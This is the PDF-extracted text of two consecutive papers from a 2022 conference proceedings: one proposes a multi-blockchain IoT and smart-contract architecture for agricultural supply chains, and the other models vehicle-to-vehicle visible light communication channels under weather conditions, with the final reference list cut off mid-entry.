Computer Research Laboratory, Superior School of Technology, Ibn Tufail University, 14000 Kenitra, Morocco [email protected] IT Department, FST Gueliz, Cadi Ayyad University, 40000 Marrakech, Morocco

Abstract. The Blockchain represents data that is both structured and shared. Instantly, it is a current approach of handling distributed databases by a group of people. The purpose is to collect data, construct a digital ledger, and distribute it to each participant using P2P techniques. Blockchain technology gets employed in various industries, including government, transport, commerce, and healthcare. This paper will focus on using Blockchain in the agricultural supply chain, particularly the multi-Blockchain strategy for increasing performance and yield tracking. This type of architecture necessitates the presence of at least two chains in one system. This study will present a new theoretical architecture based on past investigations; the article examines how to adjust the approach and lists the many phases involved. The new framework will eliminate the mistakes that have plagued past studies. First, sensors get used to supply us with the recording data sets. We then store our data in blocks using the multi-Blockchain structure. Then, to control all transactions and make choices based on the criteria in the source code of these automated contracts, we create Smart Contracts. This technique should be more effective than cloud apps or simply storing data on a Blockchain.

Keywords: Multi-blockchain system · hash

1

· agriculture · IoT · information

Introduction

Blockchain belongs to the Parallel and Distributed Computing Architecture (PDCA) family of computing platforms. It counts on a set of nodes managed and controlled by an administrator. Its goals are to save expenses, eliminate third parties, and boost efficiency and quality [1]. There are three sorts of Blockchains: Public, Private, and Permissioned. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 55–63, 2023. https://doi.org/10.1007/978-3-031-35251-5_6

56

A. El Mane et al.

The Blockchain is a peer-to-peer network (P2P system) that manages data flow without a centralized system. Instead, it’s a decentralized database that confirms the data’s integrity. As a result, all linked computers receive the latest version of info. After these nodes verified and validated the transaction, it became approved and added to the block. One of the main reasons consumers adopt Blockchains is that they don’t want a third party (banking corporations, financial companies, etc.) interfering in the communication between two nodes. At the same time, Blockchains provide a trustworthy system, and they complete the rule-following process using consensus algorithms. Smart Contracts got operated in Blockchains. Smart contracts are programming codes built as sophisticated if-then expressions. Using algorithms that examine the supplied data, it may self-verify if the conditions were demonstrated or not. Smart Contracts can then self-execute a decision. Blockchain has begun to approve the usage of Smart Contracts since it is an individual element that may perform tasks without a third party’s intervention [2]. Every invention is the outcome of a problem-solving endeavor. Blockchain technology is no different. After understanding the history of blockchain technology, it’s clear that it evolved to address a vulnerability in traditional Agricentralized systems. The vulnerability could never be eradicated but just reduced. There have always been organizations that worked as third-party legislators to minimize lack of confidence whenever parties needed to reach an agreement. One party anticipates receiving fair products, while the other anticipates receiving agreed-upon funds. Although the buyer and seller have no reason to trust each other, they finish their transaction because they have faith in the third party. Blockchain promised to solve these problems by allowing applications to be implemented in a decentralized and secure manner, providing some level of assurance. In a trustless society, this was one of the critical reasons for Blockchain’s broad popularity. The Blockchain, on the other hand, is not solely accountable for the implementation’s success. A few more protocols aid it in becoming the resilient and robust technology that it is. The decentralization of processing, P2P networks, and the maintenance of a secure and publicly distributed ledger that provides total transparency over the whole Blockchain enables Blockchain to be applied in trustless networks. Blockchain is used by community organizations, libraries, and some agricultural enterprises because transactions are securely recorded. This technology lowers the barrier to building peer-to-peer networks. Smart contracts, the Internet of Things, supply chain management, storing farm data, and identity management are all possible applications of blockchain technology. The most compelling reason to adopt Blockchain and IoT is to improve security by safeguarding essential and valuable data. The decentralized architecture will revolutionize how essential information is seen by producing a record that can’t be changed and is encrypted end-to-end. Personal data is anonymized on the Blockchain, and permissions restrict access. Instead of a single server, information is kept over a

Multi-blockchain Scheme Based on IoT and Smart Contracts

57

network of computers (distributed ledger), making it impossible for hackers to access it. Blockchain can instantly track commodities or products by establishing a journey audit log-this aids in providing proof and exposing flaws in any supply chain. Additionally, smart contracts on the Blockchain will automate transactions, increasing efficiency and speeding up the process. Smart contracts eliminate the need for human involvement and the dependency on third parties to ensure that contract requirements are followed.

2

Previous Work

According to the study “A double-Blockchain solution for agricultural sampled data security in Internet of Things network,” [3] specific malicious organizations might influence the machine and alter the gathered data. Hackers, bogus data producers, and malfunctioning tools are examples of such entities. For example, a tampered sensor in a healthcare IoT application might expose faulty cardiac heart rate measurements. This activity may potentially result in prescription mistakes. Like in agricultural applications, such issues can lead to the exposure of production secrets and crop disasters due to ineffective control strategies. Furthermore, the tampered data contributes to inaccurate watering times and quantities. The public chains like Ethereum and Hyperledger are the core of current Blockchain solutions. The consortium chains cracked the public chain’s deadlines, but data privacy may become an issue. Unfortunately, public networks like Ethereum can lack the ability to send and receive data in real-time. Moreover, they don’t have absolute decentralization. A double-chain solution will result from blending these technologies. Two Blockchains make up the system’s architecture. Ethereum is a public Blockchain that feeds users with features such as Smart Contracts. The Polkadot inter-Blockchain also secures the system. In addition, Polkadot reduces data redundancy by facilitating data dealings between chains. The system gets divided into three levels, each corresponding to a different data processing phase. IPFS is the very first network. The hash of the IPFS contents gets formed in parallel while the sampled data gets instantly placed in the IPFS network. Then, the IPFS hash data get uploaded to the second layer chain named ASDC. Multiple IPFS hash values get kept in each block of the ASDC chain. Every block included a measurement of the ASDC chain hash result. Only IPFS hash values, not files, are saved in a block at this time. As a result, the ASDC chain processes significantly less data and is easier to maintain. Many solutions can operate agricultural tasks, but each has a flaw. Using a cloud file storage system, for example, can be beneficial for data transmission but detrimental to data security. The Ethereum Blockchain technology offers a secure and non-changeable ecosystem. The Ethereum Blockchain, on the other hand, is sluggish to upload and download data. The consortium chain gets secured to a medium degree. Although the transmission speed is adequate, the shield is lacking.

58

A. El Mane et al.

The Ethereum and the Consortium chain give an appealing solution for constructing anti-tampered, entirely safe, and generally the best scheme. Of course, transferring speed is still medium, but all recorded data, on the other hand, will be safeguarded. The alteration of the data hash is the security risk that this system faces. As the agricultural IoT network grows, more and more items will join the scheme, putting pressure on the Blockchain network. The article “Research on agricultural supply chain system with double chain architecture based on Blockchain technology” [4] proposes a public doubleBlockchain for emerging agriculture administration. The Blockchain provides the necessary security and enhances the efficiency of agribusiness processes. Given the public Blockchain’s inability to secure corporate information, the paper proposes a paradigm for agricultural Blockchain based on User Information Blockchain and Transaction Blockchain. User Information Blockchain gets introduced to keep track of user details, while the Transaction Blockchain records and tracks all transaction data. The use of double-chain models in the public agriculture sector is advantageous. Without knowing the company’s confidential information, the node can utilize tools on the service network. As a result, it assures the openness of transaction data and the protection of user information on a technological level. The Merkle Tree structure maintains the secrecy of the participant’s personal information, which got kept in the User Information Chain. The transaction Blockchain ensures the transparency of the transaction process. The Merkle Patricia Tree structure gets then utilized to record and handle transaction data. The Key-Value may also be readily searched and tracked. We need to go deeper into a few issues in this project. Many resources on the public service network necessitate upgrades to all kinds of technology. In addition, the Proof-of-Stake mechanism requires specific improvements in terms of performance and power. Blockchain, IoT, and other emerging technologies can result in a high level of resource integration and evaluate the long-term viability of participant performances. Technologies can recognize numerous factors, such as crop growth, and assist upstream farmers in increasing productivity and revenue. Helping farmers deploy IoT devices with additional computer power might help processing businesses acquire more tokens. Likewise, IoT data and public data analysis outcomes determine the enterprise’s long-term viability. Green production, in general, can implement and exploit Smart contracts. The architecture comprises a double-chain structure; the scheme below shows that this system contains a main-chain and a sub-chain to accomplish the vision above and its functionalities (see Fig. 1). The Mainchain made the communication network between companies, farmers, government, and financial providers and stored account information, transaction data, and social life cycle assessment data.

Multi-blockchain Scheme Based on IoT and Smart Contracts

59

The Subchain primarily holds data acquired by IoT devices, such as agricultural information, product shipping information, and data on the environmental implications of agricultural goods. Farmers and businesses mostly upload the content. The government, customers, and financial organizations can always monitor a portion of the information as stakeholders [5].

Fig. 1. Double-Blockchain structure based on data management, IoT, and government reports.

The topic of the essay ”Hierarchical Multi-Blockchain Architecture for Scalable Internet of Things Environment.” [6] This structure also relies on a centralized Internet Service Provider (ISP) or the Cloud Service to distribute, store, and analyze our IoT data. The Blockchain network as a backbone network can handle as many transactions as feasible, most likely utilizing a BFT-variant consensus. The size of the Blockchain network will be small, but the capacity will be great. We can have numerous low-throughput sub-Blockchains under this backbone network to Notarization handle many IoT devices. Spreading transactions to the sub-Blockchains can ease the primary network’s load, improving the system power. We may also enable sub-Blockchain parallelism, which allows us to deploy many replicas of the sub-Blockchain to operate on numerous IoT activities simultaneously. They have many sub-Blockchain instances to lower the data ledger held in the sub-nodes. Consequently, there’s a better likelihood that a certain gadget will be able to attend the chain. As a result, the minimum storage requirements for becoming a Blockchain node in the sub-Blockchain get reduced.

60

A. El Mane et al.

Notarization nodes help to administer all machines distributed throughout the system. To begin with, all of the Notary nodes are responsible for governing the Core Engine. Furthermore, they are also accountable for sub-engines, which coordinate with Agent nodes (sub-nodes). These Agent nodes can shape an IoT server/user/gateway/device. On top of accessible Notary nodes, developers operate their IoT applications in a distributed manner. Through Application Programming Interfaces (APIs), the Notary node delivers all sub-engine functions to IoT applications. The article “KRanTi: Blockchain-based Farmer’s Credit Scheme for Agriculture-Food Supply Chain” [7] describes the core system that creates connections between producers, farmers, distributors, retailers, and consumers. The physical, BC, and IPFS layers make up KRanTi’s architecture. The figure below mentioned that the physical contact among the stakeholders gets reflected in the physical layer. Then there’s the BC layer, which includes a variety of Ethereum-based functions for safe and transparent data transmission and a BC-based credit facility. Finally, with KRanTi, the IPFS layer keeps the huge data off-chain running at a low cost and optimal bandwidth usage (see Fig. 2). The framework in KRanTi enlisted all stakeholders firstly. The legal documents get sent to the authority council upon registration, where the stakeholder was confirmed. The details get saved in the IPFS after confirmation. Farmers choose the seed business and seed type during the crop selection. The request, the product-id and quantity get forwarded to providers. After all the orders got delivered to the farmer, a license key was issued, showing quality. The cost is computed and compared to the given credits for the successful order. This credit payment will be made automatically within a crop production line. After the harvest of the crops, they are sorted and packed, with a unique sequence product id produced and transmitted into the QR code. Later, these get sold to the distributors who hold big harvests in warehouses. The crops are then purchased from distributors by retailers, who are then ready to sell to end-users. Finally, end-users acquire them from nearby merchants. When a consumer gives a product a recommendation score, the score gets added to the farm’s quality assurance score.

3

The Proposed Architecture

All of the preceding concepts served as inspiration for the suggested theoretical architecture. It’s a multi-Blockchain design. The figure below mentioned that the first layer is the Internet of Things (IoT). It includes all of the essential sensors and IoT hardware. A physical portion is converted into an electrical quantity by the sensors (see Fig. 3). Arduino connects to humidity, temperature, pressure, acceleration, and other sensors. Bluetooth/wireless get operated as communication tools. [8]

Multi-blockchain Scheme Based on IoT and Smart Contracts

61

Fig. 2. Multi-Blockchain structure based on the physical layer, on-chain, and off-chain data solution.

The first layer can supply us with reliable environmental data. The Arduino features will provide us with the acquired data, which will get utilized in the subsequent layers. Three separate Blockchains (BCs) make up the Blockchain layer. The Agriproduct information BC is the first BC. It’s jam-packed with product information and statistics. The user information BC is the second BC. It contains all of the information about the network’s users. The transaction information BC is the last BC. It held a wealth of information, including user personal information, intermediate information, transportation, money, farm business information, and transactions. The primary purpose of utilizing three Blockchains is to reduce data monotony. Using consortium Blockchain can also speed up data uploads and downloads. Smart Contracts get operated in this paradigm. It is a self-executing contract governed by the contract terms included therein. As a result, these Smart contracts will ensure decision correctness, openness, and clear communication between parties. Automated contracts use the most incredible level of data encryption currently possible in the security industry. The parties agree to play by the rules of the compiled system so that we can only accomplish the guaranteed outcomes. We built this theoretical architecture to combine all the advantages we can get from using sensors to give us real-time and non tampered data. Using a Blockchain organized system divided between corps details and participants’ details is also helpful, and it helped dispatch info to all network members simul-

62

A. El Mane et al.

taneously. The sub-layer above is the Smart contracts layer, which contains all the necessary source codes to execute some tasks without human interference. The contracts are auto-executed and complete the perfection of the blockchain role. The first touch of the practices consisted of injecting these Smart contracts into our blockchain scheme. The Smart contact in this project enables managing the storage, the financing, and the excellent tra¸cability of the product. Then, the whole system will show some effectiveness, raise productivity, and create trust between all the members of the Agri supply chain.

Fig. 3. Multi-Blockchain structure based on IoT and Smart Contract system.

4

Conclusion

We have made a list of prior studies on the application of multi-Blockchain architecture in the agriculture industry. The first outcome is that we get introduced to the variousness of those architectural systems, each of which has its own set of benefits. The second consequence is that we were motivated to create a theoretical architecture based on several Blockchains. The model has two layers: one for IoT and another for Blockchains. The adoption of the IoT boosts trustworthiness. Data flexibility and access speed stood improved when this Blockchain layer got used. Applying the benefits of Smart Contracts, we can say that the suggested study offers superior function extension possibilities and increased protection. Since the visionary approach has a strong application possibility, the fundamental purpose is to put this model into practice and test its effectiveness.

Multi-blockchain Scheme Based on IoT and Smart Contracts

63

Multi-Blockchain technology has found applications in different industries, such as health, smart buildings, economics, administration, and transportation. Agri-food traceability is such a critical issue. That’s a reason why many smallscale Blockchains enterprises have sprung up throughout the globe. There are still two sides to everything. Understanding the notion of Blockchain is always missing for specific individuals. This difficulty impedes the technology’s growth and rise. Also, some businesses may not wish to discuss some aspects of the manufacturing supply chain with their clients. However, there is still a slew of challenges and roadblocks to resolving.

References ¨ unda˘ 1. Dursun, T., Ust¨ g, B.B.: A novel framework for policy based on-chain governance of blockchain networks. Inf. Process. Manage. 58(4), 102556 (2021). https:// doi.org/10.1016/j.ipm.2021.102556 2. Laurence, T.: Blockchain For Dummies. PART 1 Getting Started with Blockchain, 2nd edn. John wiley and Sons Publisher, Hoboken (2017) 3. Ren, W., Wan, X., Gan, P.: A double-blockchain solution for agricultural sampled data security in Internet of Things network. Future Gener. Comput. Syst. 117, 453–461 (2021). https://doi.org/10.1016/j.future.2020.12.007 4. Leng, K., Bi, Y., Jing, L., Fu, H., Van Nieuwenhuyse, I.: Research on agricultural supply chain system with double chain architecture based on blockchain technology. Future Gener. Comput. Syst. 86, 641–649 (2018). https://doi.org/10.1016/j.future. 2018.04.061 5. Song, L., Wang, X., Wei, P., Lu, Z., Wang, X., Merveille, N.: Blockchain-based flexible double-chain architecture and performance optimization for better sustainability in agriculture. Comput. Mater. Continua 68(1), 1429–1446 (2021). http:// www.techscience.com/cmc/v68n1/41871 6. Oktian, Y.E., Lee, S.G., Lee, H.J.: Hierarchical multi-blockchain architecture for scalable internet of things environment. Electronics 9(6), 1050 (2020). https://www. mdpi.com/2079-9292/9/6/1050 7. Patel, N., Shukla, A., Tanwar, S., Singh, D.: KRanTi: blockchain-based farmer’s credit scheme for agriculture-food supply chain. Trans. Emerg. Telecommun. Technol., 4286 (2021). https://doi.org/10.1002/ett.4286 8. El Mane, A., Chihab, M., Bencharef, O., Chihab, Y.: Architectural scheme of a multi-blockchain in the agricultural field. Environ. Energ. Earth Sci. Web Conf. 297, 4 (2021). https://doi.org/10.1051/e3sconf/202129701056

A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels Fatima Zahra Raissouni1,2(B) and Abdeljabbar Cherkaoui1 1 Laboratory of Innovative Technologies (LTI), National School of Applied Sciences,

Abdelmalek Essaâdi University, Tangier, Morocco [email protected], [email protected] 2 Department of Electronics, University of Alcalá, 28801 Alcalá de Henares, Madrid, Spain

Abstract. The Intelligent Transport systems based visible light communication presents a promising solution for realizing high-speed wireless networks. While this technology has been widely studied for indoor environments, it is still an early stage for an outdoor environment. The key outdoor challenges are mobility and weather conditions. The main paper’s goal is to evaluate the performance of vehicular visible light communication systems in the presence of interfering vehicles and weather conditions. First, we proposed a geometrical model to perform the analysis. Then we study the impact of the vehicle-to-vehicle link under dynamic behavior in the presence of other surrounding vehicles and various weather conditions. The results are validated by an accurate simulation. Keywords: Vehicle to vehicle (V2V) · Visible light communication (VLC) · Outdoor channel model · Vehicular visible light communication (VVLC) · Channel modeling · ITS

1 Introduction According to the Global status report on road safety 2018, issued by the World Health Organisation states: ‘deaths from road traffic crashes have increased to 1.35 million a year. That is nearly 3700 people are killed on the world’s roads every day’ [1]. A promising solution to overcome this problem is the intelligent transport systems (ITS) which can significantly improve road safety and transportation, provide additional capabilities for enhancing traffic flow, and address environmental concerns by monitoring driving behavior. Besides safety, communication systems can share data between cars and the road infrastructure in real time by alerting drivers and providing information for safe driving [2]. Thus, the overall performance of transportation systems can be entirely improved. Wireless vehicular communication systems, also known as ‘connected vehicles’ [3] are a new type of network. By taking advantage of the modernity of vehicles that are equipped with numerous electronic sensors for monitoring speed, position, heading, etc., establishing a V2V © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 64–72, 2023. https://doi.org/10.1007/978-3-031-35251-5_7

A Geometry-Based Analytical Model

65

communication to communicate this information wirelessly will be very interesting to enhance not only the safety but also the comfort. In recent years, research on vehicular communications has greatly expanded due to its promise to facilitate the deployment of the Internet of Vehicles [4]. Driven by the hole demand of wireless communication, visible light communication opens up an entirely new domain of possibility to perform the existing forms of wireless communications [5]. Furthermore, VLC has a relatively brief history compared to radio communication technology: it was recently standardized in 2011 [6].VLC provides several advantages such as an enormous and unregulated bandwidth, avoiding interference with RF systems, no health hazard, low power consumption, and better security in the physical layer [5]. Their use is primarily considered for indoor applications. However, its application for outdoor ITS is a natural solution for vehicle networking, which is strongly favored by the wide distribution of LED lighting sources such as traffic lights, headlamps, and turn-indicator signals. Thus, based on its highly appealing features and its dual functionality as a source of lighting and communication, the VLC is promised to become a major enabler for ITSs [7]. In this regard, it was proven in numerous studies that VLC is up to the demands required of vehicle networks under real working conditions [8, 9]. 1.1 Related Works As in the development of any wireless system, channel modeling is critical for the design and evaluation of vehicular VLC performance [10]. Just as we have previously mentioned, VVLC is still early because of the challenges it has to face, such as the fact that it requires a LOS link, which might not always be available in outdoor scenarios, e.g., due to mobility and also to the Meteorological phenomena like fog, rain, snow, and other weather particles, the transmitted signal is degraded by both absorption and diffusion of the light waves [10]. The different modeling approaches for v2v channels can be classified into three categories: stochastic models, deterministic models, and geometry-based stochastic models(GBSMs) [11]. A comprehensive and detailed review study of the existing vehicular communication channel models can be found in [11–13]. We briefly review related works which are closely relevant to our study. In [14] authors used a geometry based model of road surface reflection, which considers LOS and NLOS components. The latter model ignored all other reflections, e.g., other surrounding vehicles as well as atmospheric effects. Similarly, in [15] authors proposed a vehicular communication system model based on outdoor MIMO-VLC and used a new modular method to improve system performance. However, this method does not take into account the impacts of background light and weather conditions on the modeling performance of the channels. Furthermore, there is a need to study channel modeling for outdoor applications under atmospheric conditions such as fog, rain, etc. as well as the dynamic aspects. There are some works in this context, such as [16], which performed a simulation analysis of the attenuation introduced by the effect of rain and snow on the V2I (vehicle to infrastructure) based VLC.

66

F. Z. Raissouni and A. Cherkaoui

In [17–19], authors use the based ray-tracing method to model the channel, which is categorized into deterministic channel-modeling approaches. This model requires a detailed and time-consuming description of the propagation environment, making it difficult to apply to a broader range of scenarios [11]. Alternatively, some other works use geometry-based stochastic channel modeling, which is less complex and easy to generalize. Such in [20], they proposed a GBSM for the vehicular channel. The proposed model has already considered light reflected from surrounding moving vehicles and from stationary roadside. However, the proposed model may not appropriately describe the VVLC due to directional radiation and reflection of the light; Unlike RF waves, which propagate in all directions, light waves only propagate in straight lines[10]. Similarly, GBDM has been proposed for the VLC mobile indoor channels in [21]. Most recently, authors in [22] proposed a new regular shape for the GBSM model with an elliptic form to characterize the VLC channel. However, weather conditions and road reflection for example were ignored in this work. According to the literature, there are still many remaining challenges that are not yet addressed in VVLC channel modeling systems. In this work, we propose to use a geometrical model without the precision of any shape, according to the directional emission of the light source. The choice of this approach is justified because of the flexibility in the description of the VVLC channels [12], especially in the description of the location of the vehicles, of their speed, and of the stationary and non-stationary reflectors that change dynamically. The remainder of this paper is structured as follows: Sect. 2 presents the system model as well as our channel modeling approach. Section 3 demonstrates and discusses the simulation results. Finally, the conclusion summarizes the outcomes of this work.

2 System Model Visible light communication systems typically consist of two main components: a VLC emitter and a VLC receiver separated by the VLC channel. For the V2V scenario, LED headlamps correspond to transmitters to send necessary information (e.g., user data and positioning information) via visible lights and photodetectors (e.g., photodiodes, in this study) or imaging sensors (e.g., camera) playing the role of receivers. The data transmission ability is considered as a secondary function, complementary to the main lighting and/or signaling function. However, the data transmission must not affect in either way the basic function of lighting or signaling [26]. For this reason, the VLC emitter must use the same optical power or if the application requires it, to allow for light dimming [26]. A central element of the VLC transmitter is the encoder that converts the data into a modulated message. The encoder controls the switching of the LEDs depending on the binary information and the required data rate. The binary data is thus converted into a modulated light beam. The visible light pulses originated at the system’s emitter are collected in a photodetector. The parameters that characterize the detector are field of view (FOV), responsivity, and active area.

A Geometry-Based Analytical Model

67

Figure 1 Shows the communication block diagram for the V2V VLC communication model. Our study

Data

Source coding

Channel Coding

Tx LED Headlamp

Modulation

VLC Channel V2V

Data

Source Decoding

Channel Decoding

Demodulation

Rx PD sensor on the tail

Fig. 1. VVLC communication System Block Diagram.

The VLC channel is modeled by means of the typical path loss additive white Gaussian noise (AWGN) channel model [23] (Fig. 2.). In this model, the output current Y (t) produced by the photodiode (PD) is linked with the optical power transmitted X(t) by: Y (t) = X (t) ⊗ h(t) + N (t)

Y(t)

h(t)

X(t)

(1)

N(t)

Fig. 2. Communication System Block Diagram.

where ⊗ refers to convolution operation, h(t) is the channel impulse response (CIR) [10] which combines the geometrical propagation path loss and the effect of weather conditions, it is expressed by: h(t) = .ha hg (t)

(2)

where,  is the photodiode responsivity(A/W), ha is the atmospheric attenuation and, hg is the geometrical propagation path loss. 2.1 Atmospheric Attenuation ha The atmospheric attenuation can be described by the following Beer’s law equation [10]: ha = τ (d ) = e−γ d

(3)

where γ is the extinction coefficient per unit of length, and τ(d) is the transmittance at the distance d from the transmitter. Based on [24], the extinction coefficient. For clear, rainy, and foggy weathers, respectively: γ = 1.5 × 10−5 , 0.9 × 10−3 , and 0.078.

68

F. Z. Raissouni and A. Cherkaoui

2.2 The Geometrical Propagation Path Loss hg In this study, we propose a geometrical model to study the dynamic VVLC. As shown in Fig. 3. The vehicle Tx represents the transmitter which transmits the signal using the headlights, whereas Rx represents the receiver. Vx represents a neighbor vehicle, which is considered as a reflector, and it assumed to be Lambertian. We suppose that the transmitter, receiver, and reflector move in the same direction with the speeds of υTx , υRx , and υvx , respectively.

Fig. 3. Proposed model for VVLC channel

Therefore, the geometrical paths hg (t) include a LOS component, and a non-LOS reflected is given by: hg (t) = hLOS (t) + hNLOS (t)

(4)

where the DC channel gain of the LOS path for the Lambertian source is given by: hLoS (t) =

(m + 1)Ar 2π (DTR (t))

2

cosm (ϕ)Ts (θ )g(θ )cos(θ ) × δ(t −

DTR (t) ) c

(5)

where Ar is the active area of the optical receiver, DTR (t) represents the time-varying distance between Tx and Rx, ϕ is the irradiance angle, θ is the incidence angle, and δ(t − DTRc (t) ) is the propagation delay of the signal. T(θ) is an optical filter gain that is used to block out-of-band natural and artificial light signals. Using a lens alongside with an optical filter will effectively enhance the detectivity of the PD and reduce undesired ambient light, g(θ) is the concentrator gain is given as:  2 n , 0 ≤ θ ≤ FOV (6) g(θ ) = sin2 (θ) 0, θ > FOV in which n indicates lens refractive index of PD, m is the Lambertian emission order ln(2) , specifying transmitter directivity of the transmitter and obtained by: m = − ln(cos(ϕ 1/2 )) and ϕ1/2 is the half-power angle of the radiation.

A Geometry-Based Analytical Model

69

In our model, the vehicles move in a stable lineup having negligible lateral angular deviation, therefore it is a valid condition to consider: ϕ = θ = 0. Then the DC channel gain HLoS (0) can be rewritten as: H LoS (0) =

(m + 1)Ar 2π(DTR (t))2

(7)

Similarly, the reflection from the Vehicle reflector is given by: hNLoS (t) =

N  i=1

(m + 1) 2π (d Tx−Vx

)2

          dTx−Vx + dVx−Rx i i .. × (m + 1)Ar ρv cosm ϕ i cos θ i cosm ϕTx × cos θVx Vx Rx × δ t − 2 c 2π (d Vx−Rx )

(8) where N is the number of reflectors. ρv , denotes the reflection coefficient of the vehicle’s body. dTx−Vx , and dVx−Rx represent respectively the distance between transmitter and reflector and between reflector and receiver. ϕTx , ϕvx represent the angle of departure (AoD) of the waves emitted from the optical source and reflector respectively. Similarly, θRx , and θVx , „ represent the angle of arrival (AoA) of the waves that reach the receiver and reflector respectively. Based on trigonometric relation (Fig. 3), the angles and distances can be rewritten as: √ √  Vx = cos−1 a dTx−Vx = a2 + H 2 ; dVx−Rx = b2 + H 2 ; ϕTx H Rx ϕVx

=

tan−1

    b Tx −1 a ; θ Vx = tan−1 H Rx H ; θVx = tan H b

(9)

3 Simulation Results and Analysis For simulation purposes, the entries of the environment parameters are summarized as follow: The transmission power is 1 mW and the reflection coefficient is ρv = 0.8 (Table 1). we assume that the transmitter and receiver vehicles are moving in the same direction and at different speeds, υTx = 6 m/s and υRx = 4 m/s, corresponding to 21.6 km/h and 14.4 km/h, respectively; note that the speeds were chosen according to the urban speed limits [20]. For the positions and number of reflectors, they are assumed to be random and change continuously over time according to the value of distances. The initial distance between transmitter and receiver is supposed to be 70 m in the first case of study. Figure 4 shows the performance CIR of the LOS and the NLOS components when the transmitter and the receiver are moving in the same direction and with different velocities, we can notice that the received power of the LOS component is greater than the received power of the reflection component by five orders of magnitude. This decrease can be justified by the fact that the relative speed of the vehicles affects the received power of the reflection component more than the received power of the LOS component according to the results in [22].

70

F. Z. Raissouni and A. Cherkaoui Table 1. Simulation Parameters

Symbol

Description

Value

FOV

The receiver field of view (FOV)

70°

g(θ)

The gain of the concentrator

1.0

Ar

Active area of the receiver

1 cm2

T(θ)

Optical filter’s transmission coefficient

1.0

ρv

Vehicles Reflectivity

0.8 [25]

Fig. 4. CIR: a) LOS component and b) NLOS component.

In Fig. 5, we present the received power considering the impact of the weather conditions for clear, foggy, and rainy weather conditions given visibility of V = 50 m (In that case, The initial distance between transmitter and receiver is supposed to be 10 m). The results show that in general, the received power decreases as the distance increases, which is an intuitive behavior. However, in terms of the impact of weather conditions, it can be noticed that the received power is more affected by fog conditions, and it introduces significant degradation. In the meantime, we can notice that the rain has a negligible effect on the VLC link. The results show that the impact of the weather conditions decreased the power by − 61.51 dBm and −78.25 dBm for rain and fog respectively.

A Geometry-Based Analytical Model

71

-60 Clear

-65

Foggy Rainy

Pr (dBm)

-70 -75 -80 -85 -90 -95 10

15

20

25

30

35

40

45

50

Distance (m)

Fig. 5. Received optical power versus distance for: (a) clear weather (b) rainy weather (c) foggy weather.

4 Conclusion Efficient channel models are required to simulate the propagation channel effectively. Especially the VVLC channel is in great need of research efforts since it is still in its early stage. It is crucial to consider the channel conditions representing a real environment to develop a comprehensive system model. This work represents a contribution in this regard, in which we are based on a geometrical model to characterize the impact of NLOS and weather conditions under dynamic conditions. According to the simulated results, the reflections resulting from the surrounding cars cause V2V VLC propagation, which does not produce a noticeable impact on the performance. In contrast, fog conditions affect the performance link more than rain and clear weather. In future works, we aim to improve our model by considering the effect of other disruptions and challenges of a realistic channel model.

References 1. World Health Organization: Global status report on road safety 2018 (2018) 2. Cailean, A.-M., Cagneau, B., Chassagne, L., Popa, V., Dimian, M.: A survey on the usage of DSRC and VLC in communication-based vehicle safety applications. In: Proceedings of the 2014 IEEE 21st Symposium on (SCVT) in the Benelux, pp. 69–74, November 2014 3. Uhlemann, E.: Introducing connected vehicles [connected vehicles]. IEEE Veh. Technol. Mag. 10(1), 23–31 (2015) 4. Ji, B., et al.: Survey on the internet of vehicles: network architectures and applications. IEEE Commun. Stand. Mag 4(1), 34–41 (2020) 5. Jovicic, A., Li, J., Richardson, T.: Visible light communication: opportunities, challenges and the path to market. IEEE Commun. Mag. 51(12), 26–32 (2013) 6. IEEE: 802.15.7 Standard for local and metropolitan area networks. Part 15.7: Short-range wireless optical communication using visible light (2011). https://standards.ieee.org/standard/ 802_15_7-2011.html (consulté le juin 19, 2020)

72

F. Z. Raissouni and A. Cherkaoui

7. Pathak, P.H., Feng, X., Hu, P., Mohapatra, P.: Visible light communication, networking, and sensing: a survey, potential and challenges. IEEE Commun. Surv. Tutor. 17(4), 2047–2077 (2015) 8. Enabling vehicular visible light communication (V2LC) networks. In: Proceedings of the Eighth ACM International Workshop on Vehicular Inter-networking. https://dl.acm.org/doi/ abs/https://doi.org/10.1145/2030698.2030705 (consulté le juin 18, 2020) 9. Akanegawa, M., Tanaka, Y., Nakagawa, M.: Basic study on traffic information system using LED traffic lights. IEEE Trans. Intell. Transp. Syst. 2(4), 197–203 (2001) 10. Ghassemlooy, Z., Popoola, W., Rajbhandari, S.: Optical Wireless Communications: System and Channel Modelling with MATLAB®. CRC Press, Boca Raton (2017) 11. Al-Kinani, A., Wang, C.-X., Zhou, L., Zhang, W.: Optical wireless communication channel measurements and models. IEEE Commun. Surv. Tutor. 20(3), 1939–1962 (2018) 12. Wang, C.-X., Bian, J., Sun, J., Zhang, W., Zhang, M.: A survey of 5G channel measurements and models. IEEE Commun. Surv. Tutor. 20(4), 3142–3168 (2018) 13. Wang, C., Cheng, X., Laurenson, D.I.: Vehicle-to-vehicle channel modeling and measurements: recent advances and future challenges. IEEE Commun. Mag. 47(11), 96–103 (2009) 14. Luo, P., Ghassemlooy, Z., Minh, H.L., Bentley, E., Burton, A., Tang, X.: Performance analysis of a car-to-car visible light communication system. Appl. Opt. 54(7), 1696 (2015) 15. Farahneh, H., Khalifeh, A., Fernando, X.: An outdoor multi path channel model for vehicular visible light communication systems. In: Proceedings of the 2016 Photonics North (PN), Quebec City, QC, Canada, p. 1, May 2016 16. Zaki, R.W., Fayed, H.A., Abd El Aziz, A., Aly, M.H.: Outdoor visible light communication in intelligent transportation systems: impact of snow and rain. Appl. Sci. 9(24), 5453 (2019) 17. Eldeeb, H.B., Miramirkhani, F., Uysal, M.: A path loss model for vehicle-to-vehicle visible light communications. In: Proceedings of the 2019 15th International Conference on Telecommunications (ConTEL), Graz, Austria, pp. 1–5, July 2019 18. Miramirkhani, F., Uysal, M.: Channel modeling and characterization for visible light communications. IEEE Photonics J. 7(6), 1–16 (2015) 19. Lee, S.J., Kwon, J.K., Jung, S.Y., Kwon, Y.H.: Simulation modeling of visible light communication channel for automotive applications. In: Proceedings of the 2012 15th International IEEE Conference on Intelligent Transportation Systems, pp. 463–468, September 2012 20. Al-Kinani, A., Sun, J., Wang, C.-X., Zhang, W., Ge, X., Haas, H.: A 2-D non-stationary GBSM for vehicular visible light communication channels. IEEE Trans. Wirel. Commun. 17(12), 7981–7992 (2018) 21. Al-Kinani, A., Wang, 